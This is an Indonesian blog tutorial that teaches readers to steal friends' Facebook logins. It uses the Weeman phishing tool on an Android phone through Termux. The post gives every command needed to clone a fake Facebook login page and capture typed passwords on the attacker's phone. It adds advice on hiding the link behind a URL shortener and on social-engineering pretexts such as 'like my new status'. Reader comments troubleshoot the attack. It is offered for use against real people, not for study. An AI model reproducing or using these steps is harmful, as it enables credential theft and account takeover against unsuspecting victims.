Cara Membobol Facebook Dengan Android Dan Weeman 100% WORK

sukakoding.com

Hai sukakoders apa kalian tahu hanya dengan HP Android kalian bisa membobol facebook temen kalian dengan sangat mudah. Tapi sebelum admin lanjutkan sampai ke tutorial disini admin tegaskan tidak akan bertanggung jawab jika ada sesuatu yang tidak diinginkan.

Banyak blog blog diluar sana yang membuat tutorial tentang Membobol facebook dengan weeman tapi menggunakan cara yang salah karena kurangnya pengetahuan tentang penggunaanya sendiri. Pada tutorial ini admin akan menekankan pada penjelasan sehingga kalian yang tidak tahu sama sekalipun akan mengerti cara mainnya dari alat ini.

Alat Dan Bahan

Ada beberapa alat yang harus kalian persiapkan terlebih dahulu seperti

  • HP Android Versi 5.0 keatas
  • Aplikasi Termux
  • Python v.2
  • Git
  • Internet

Skenario

  1. Buat fake login atau login palsu menggunakan weeman.
  2. Share link ke korban.
  3. korban menginputkankan username dan password.
  4. password terkirim ke server local di HP Android.

Eksekusi

Silahkan buka Termux kalian kemuadian install python dan git. Jika kalian gak tahu caranya silahkan klik disini.

Jika sudah kalian bisa melakukan cloning dengan perintah

git clone https://github.com/evait-security/weeman.git

Jika sudah silahkan buka folder weeman dengan perintah

cd weeman

Untuk meminimalisisr kegagalan ada baiknya kalian gunakan wifi. karena disinilah letak kegagalan yang sering di alami oleh para pemula. kenapa bisa begitu? nanti akan admin jelaskan di akhir.
Sebelum mengeksekusi kalian lihat dulu berapa IP kalian dengan perintah

ifconfig

sukakoding.com

lihat informasi tentang wifi. scroll kebagian paling bawah lihat bagian wlan0

sukakoding.com

Perhatikan bagian yang admin tandai. Itulah IP yang di berikan router wifi ke HP Admin. IP ini berbeda beda. bahkan mungkin saja IP kalian berbeda dengan punya admin. Catat IP kalian karena inilah kunci dari keberhasilan alat ini.

Baca Juga:  Trik Nakal! Begini Cara Nyuri Chat Pasangan kamu Lewat Gmail

Jika sudah kalian bisa mengeksekusi weeman deengan perintah

python2 weeman.py

Jika kurang jelas silahkan lihat gambar dibawah.

sukakoding.com

Selanjutnya tinggal kalian konfigurasi sedikit.

masukan perintah berikut

set url https://m.facebook.com

Disini admin sarankan kalian menggunakan m.facebook.com agar tampilan facebook dalam bentuk mobile. karena biasanya nanti korban kalian juga akan membuka lewat HP. jika target kalian menggunakan PC/ Laptop silahkan gunakan url versi Desktop-nya seperti https://facebook.com.

Jika sudah masukan perintah

set action_url http://192.168.1.4

nah disinilah letak kesalahan yang sering dilakukan. banyak tutorial yang salah mengisi dengan menggunakan url facebook padahal dari function nya saja sudah menunjukan bahwa dia membutuhkan parameter untuk menampung mau di letakan dimana hasil download dari halaman facebook tadi. jika kalian isi dengan set actopn_url https://facebook.com ini gak akan eror tapi aksi kalian secara default akan di jalankan di localhost. untuk penjelasan yang lebih jauh akan admin jelaskan di akhir. selanjutnya jalankan perintah

set port 8080

Port itu ibarat gerbang. Jadi bisa dikatakan port adalah jalur untuk keluar masuk nya data. kenapa kita butuh port? ya karena kalian butuh pintu untuk masuk rumah. lewat port inilah username dan password korban akan dikirimkan. Selain menggunakan port 8080 kalian juga bisa menggunakan port 8000. jika semua konfigurasi sudah selesai kalian bisa menjalankan server palsu kalian dengan perintah

run

sukakoding.com

untuk menguji apakah server kalian sudah jalan atau belum bisa kalian cek di browser. silahkan ketik di bagian url nomor.ip.kalian:8080

sukakoding.com

perhatikan pada bagian url. ketika kalian mengetik IP kalian maka yang akan tampil adalah halaman facebook. ketika korban lengah dan tidak sadar mengetikan email dan password maka yang terjadi adalah email dan password tersebut akan terkirim ke server localhost kalilan. Dibawah adalah contoh korban yang terpancing.

Baca Juga:  Cara Membobol Akun Facebook Dengan Tangan Kosong

sukakoding.com

gimana mudahkan? kalian juga bisa berimprovisasi sedikit agar temen kalian tidak curiga dengan menggunakan jasa pemendek url seperti bit.ly caranya silahkan kalian buka dulu website bit.ly jika sudah copy kan IP kalian beserta port nya lalu klik shorten dan ambil hasilnya.

sukakoding.com

sukakoding.com

url itulah yang akan kalian sebarkan.

masih banyak lagi improvisasi yang bisa kalian lakukan untuk meyakinkan korban agar tidak curiga. Teknik meyakinkan korban ini sering di sebut social engineering. Contoh: kalian bisa membagi ke temen kalian dengan alasan “eh like status baru aku dong. nih url nya ( url hasil yang tadi)” Ketika temen kalian yang polos itu mengklik tautan itu dan memasukan email dan password, maka email dan password temen kalian akan terkirim ke hp kalian.

Catatan Dan Faktor Keberhasilan

1. Trik ini hanya bekerja dalam satu jaringan. Makanya disini admin sarankan untuk menggunakan wifi karena jika ada wifi pasti yang menggunakan lebih dari satu orang contoh wifi sekolah, wifi kerja dll. Dan untuk mendapatkan IP tadi hanya didapat dari wifi, karena router wifi lah yang memberikanya. Jika kalian menggunakan data internet, kalian akan tetap mendapatkan IP tapi IP itu dinamis makanya IP itu tidak bias digunakan. IP dinamis adalah IP yang berubah ubah. Sedangkan kalian butuh IP yang stabil atau static untuk menjalankan server.

2. Jangan gunakan localhost, tapi gunakanlah IP dari wifi. Kenapa? karena jika kalian menggunakan localhost maka server kalian hanya bisa berjalan pada komputer yang sama. Makanya jika kalian mengatur set action_url http://facebook.com atau set action_url http://localhost atau set action_url http://127.0.0.1 akan tetap bekerja tapi hanya di HP kalian saja. jika kita telaah sejanak jalur dari yang menggunakan localhost akan seperti Android (server) -> korban (client) -> Android (server) . Berbeda jika kalian menggunakan wifi, maka jalurnya akan seperti Android (server/client) -> wifi (router) -> korban (client) -> wifi (router) -> Android (server/client). dari skema ini terlihat bahwa server kita dapat berkomunikasi dengan client melalui router wifi. Dengan begitu walaupun korban kalian berada ratusan meter selama masih terhubung dengan wifi yang sama dengan kalian bisa dipastikan trik ini akan bekerja.

Baca Juga:  #4. Tutorial HTML Dasar - Tag Tag Dan Atribut Pada HTML (Bahasa indonesia)

3. Menggunakan jasa pemendek url atau menambahkan berita berbau viral. Tapi disini admin tidak mengajarkan kalian untuk membuat berita hoax ya.

Oke admin rasa penjelasan diatas dapat membantu kalian yang baru belajar untuk menjadi Hacker yang hebat 😀

Baca Juga:

Cara Install Python Dan Git Di Termux

Cara Membuat Website Professional 100% GRATIS Terbaru

13 Balasan pada “Cara Membobol Facebook Dengan Android Dan Weeman 100% WORK”

    1. jika kamu langsung praktek gak ribet kok. di atas sudah admin jelasin secara detil step by step. gak paham pun jika kamu ikuti tutorialnya sampai habis pasti tetep Work 😀

        1. nah ini kesalahan yg biasa sy sebutkan di atas.
          gampangnya website tersebut cuma berjalan di localhos agan.
          untuk bisa berjalan agan dan temen agan harus satu jaringan dan scriptnya di install dengan ip agan (bukan ip localhost tapi ip yg di beri oleh router wifinya)

  1. Pingback: Download Script Phising Mobile Legends Bang Bang - Suka Koding

  2. Pingback: Cara Membobol Akun Facebook Dengan Tangan Kosong - Suka Koding

  3. Pingback: Cheat Lineage2 Revolution - Suka Koding

  4. Ane udh berhasil tpi ko cuman bisa di buka di hp ane doang gan? Ane coba tes di hp tmen url nya gak bsa kebuka

Tinggalkan Balasan

This site uses Akismet to reduce spam. Learn how your comment data is processed.